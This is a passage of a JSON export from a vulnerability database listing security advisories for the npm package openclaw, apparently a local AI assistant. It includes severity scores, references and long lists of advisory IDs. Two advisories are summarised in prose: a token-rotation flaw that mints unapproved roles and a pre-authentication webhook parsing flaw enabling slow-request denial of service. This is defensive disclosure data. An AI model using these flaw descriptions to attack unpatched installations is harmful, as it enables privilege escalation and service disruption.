j-qkh2"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-q3a2-qk5j-1yat"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10"}],"aliases":["CVE-2026-43584","GHSA-vfp4-8x56-j7c5"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-zu4s-jnn3-1kd8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90353?format=json","vulnerability_id":"VCID-zunq-wnnf-k3fw","summary":"## Impact\n\nOpenClaw `device.token.rotate` mints tokens for unapproved roles, bypassing device role-upgrade pairing.\n\nDevice token rotation could mint or preserve roles/scopes that had not gone through the intended pairing approval.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= v2026.04.01`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @nicky-cc  of Tencent zhuque Lab ([https://github.com/Tencent/AI-Infra-Guard](https://github.com/Tencent/AI-Infra-Guard)) for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42422","reference_id":"","reference_type":"","scores":[{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.1604","published_at":"2026-06-05T12:55:00Z"},{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.15986","published_at":"2026-06-07T12:55:00Z"},{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.1603","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42422"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T13:03:32Z/"}],"url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-whf9-3hcx-gq54","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T13:03:32Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-whf9-3hcx-gq54"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42422","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42422"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-role-bypass-in-device-token-rotate-function","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T13:03:32Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-role-bypass-in-device-token-rotate-function"},{"reference_url":"https://github.com/advisories/GHSA-whf9-3hcx-gq54","reference_id":"GHSA-whf9-3hcx-gq54","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-whf9-3hcx-gq54"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109872?format=json","purl":"pkg:npm/openclaw@2026.4.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"}],"aliases":["CVE-2026-42422","GHSA-whf9-3hcx-gq54"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"7.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-zunq-wnnf-k3fw"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50592?format=json","vulnerability_id":"VCID-zwzb-t4a7-tff8","summary":"OpenClaw has pre-auth webhook body parsing that can enable unauthenticated slow-request DoS\nOpenClaw webhook handlers for BlueBubbles and Google Chat accepted and parsed request bodies before authentication and signature checks on vulnerable releases. This allowed unauthenticated clients to hold parser work open with slow/oversized request bodies and degrade availability (slow-request DoS).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32011","reference_id":"","reference_type":"","scores":[{"value":"0.0009","scoring_system":"epss","scoring_elements":"0.25486","published_at":"2026-06-07T12:55:00Z"},{"value":"0.0009","scoring_system":"epss","scoring_elements":"0.25531","published_at":"2026-06-06T12:55:00Z"},{"value":"0.0009","scoring_system":"epss","scoring_elements":"0.25545","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32011"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/d3e8b17aa6432536806b4853edc7939d891d0f25","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-20T15:03:36Z/"}],"url":"https://github.com/openclaw/openclaw/commit/d3e8b17aa6432536806b4853edc7939d891d0f25"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-slow-request-denial-of-service-via-pre-auth-webhook-body-parsing","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-20T15:03:36Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-slow-request-denial-of-service-via-pre-auth-webhook-body-parsing"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32011","reference_id":"CVE-2026-32011","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32011"},{"reference_url":"https://github.com/advisories/GHSA-x4vp-4235-65hg","reference_id":"GHSA-x4vp-4235-65hg","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-x4vp-4235-65hg"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-x4vp-4235-65hg","reference_id":"GHSA-x4vp-4235-65hg","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-20T15:03:36Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-x4vp-4235-65hg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74401?format=json","purl":"pkg:npm/openclaw@2026.3.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-2927-2whr-sudd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-74bc-hfqh-cbcd"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-